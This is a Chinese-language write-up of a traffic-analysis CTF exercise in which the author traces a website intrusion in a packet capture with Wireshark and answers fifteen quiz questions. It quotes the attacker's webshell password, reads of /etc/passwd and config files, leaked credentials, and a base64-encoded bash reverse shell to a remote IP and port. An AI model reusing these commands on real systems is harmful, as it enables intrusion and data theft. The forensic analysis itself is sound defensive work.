揭秘 | 实操溯源分析黑客攻击网站流量!

免责声明

本公众号提供的工具、教程、学习路线、精品文章均为原创或互联网收集，旨在提高网络安全技术水平为目的，只做技术研究，谨遵守国家相关法律法规，请勿用于违法用途，如果您对文章内容有疑问，可以尝试加入交流群讨论或留言私信，如有侵权请联系小编处理。

2

内容速览

起因是发现一道基础而又系统的流量包分析题,竟然由易到难,有15道题,一时来了兴致,先刷为敬,全文边实操边编写,分析的不一定对,仅供参考

实操解题

使用wireshark打开流量包

发现这是一个渗透过程的流量数据,阅读题目后发现,可以从上传木马作为突破口 因为一句话大多都带有POST[]等字样

直接过滤,发现了上传的数据包,http追踪后发现一句话木马的密码(h4ck4fun),和上传的文件名(/static/upload/other/20220706/1657037870691680.phtml)

因而围绕这个小马地址来探索黑客执行了什么命令

http matches "/static/upload/other/20220706/1657037870691680.phtml" && http.request.method == "POST"

发现黑客连接小马后 执行的第一个命令是phpinfo(),追踪该数据包

发现该网站框架为Zend v3.0.0,操作系统为ubuntu0.16.04.1,PHP Version 7.0.33-0 继续查看黑客执行的命令的数据包,发现其打开了几个敏感的文件 打开了/etc/passwd

打开了/var/www/html/config/config.php

打开了/var/www/html/admin.php ,发现了管理员的名称和邮箱

打开了/var/www/html/config/database.php文件,存在数据库的账号密码等配置信息

还进行了敏感的操作,如 查看用户权限命令whoami,回显为www-data用户权限

打包网站源代码

打包密码为5034737377307264还进行了反弹shell

对该命令进行base64解密

echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTEuMTIzLjIyMi4zMzMvNDQ0NCAwPiYx|base64 -d

拿到真实的命令为,可见黑客准备将shell反弹到111.123.222.333机器4444端口上

bash -i >& /dev/tcp/111.123.222.333/4444 0>&1

黑客反弹了tcp协议的shell,同时也拿到了mysql数据库的密码,因而会去查询数据库数据 所以需要使用如下语法获取该数据包

tcp contains "mysql"

image.png

直接追踪tcp数据流,发现使用mysql查询语句

发现存在如下数据库

information_schema.....mysql ....pbootcms.....performance_schema.....sys... ... 当前数据库为pbootcms

黑客除了翻看库名、表名外,还查询了账号密码

获得其中xiaoming的账号的密码为MXFhejJ3c3g=,解密为1qaz2wsx由此可知,黑客直接上传了小马,然后获取到数据库配置信息,连接了数据库,还打包了网站源代码,并将shell反弹了

但是有个问题还没搞清楚,上传是需要后台登录的,但是黑客是如何登录的,以及后台地址在哪,这个后台是哪家公司的都尚未可知.

转换思路,后台登录肯定是POST,且链接中含login或admin字样

http.request.method == "POST"

筛选数据包,发现存在4个admin.php登录数据包,其中最后一个登录的登录密码为admin123,直接登录成功跳转到后台/index/home主页中去了,登录 返回包时间为Date: Tue, 05 Jul 2022 16:17:11

黑客明显是通过后台弱口令进入的,连爆破工具都没用!运气忒好了!

这到底是哪家公司设置的弱口令? 直接上过滤语法

http.request.method == GET

找到访问首页的数据包7980 ,直接找到公司相关的信息

值得说道的是,如果从Logo图标出发,却有着不一样的答案

这里也把思路大致说一下,如果从logo上着手,会发现是另外一家公司

通过百度的以图搜图

综合筛选条件

锁定为海南鑫建恒丰科技工程有限公司

答题

从实操溯源的信息,进而可以答以下的问题:

攻击者的IP? 10.211.55.4

受害者的IP? 192.168.0.177

受害者网站的框架 Zend V3.0

网站管理员的邮箱hnxsh@foxmail.com(在admin.php中发现) /website@ndt.com(后台登录账号)

网站后台的弱口令 admin123

初次登录后台的时间 请求访问时间为: 2022-07-06 00:17:10 服务器返回时间为: 2022-07-05 16:17:11

受害者公司地址,精确到市 南昌市(首页直接显示) / 海口市(通过Logo查找)

黑客上传的木马的名字 1657037870691680.phtml

黑客木马的连接密码h4ck4fun

黑客获取到的账号权限 www-data

数据库的连接密码p4ssw0rd

服务器有多少个数据库 5个

数据表中ay_user中用户名xiaoming的密码1qaz2wsx

黑客把网站打包了,打包的密码是什么5034737377307264

黑客进行反弹shell的目标IP是多少111.123.222.333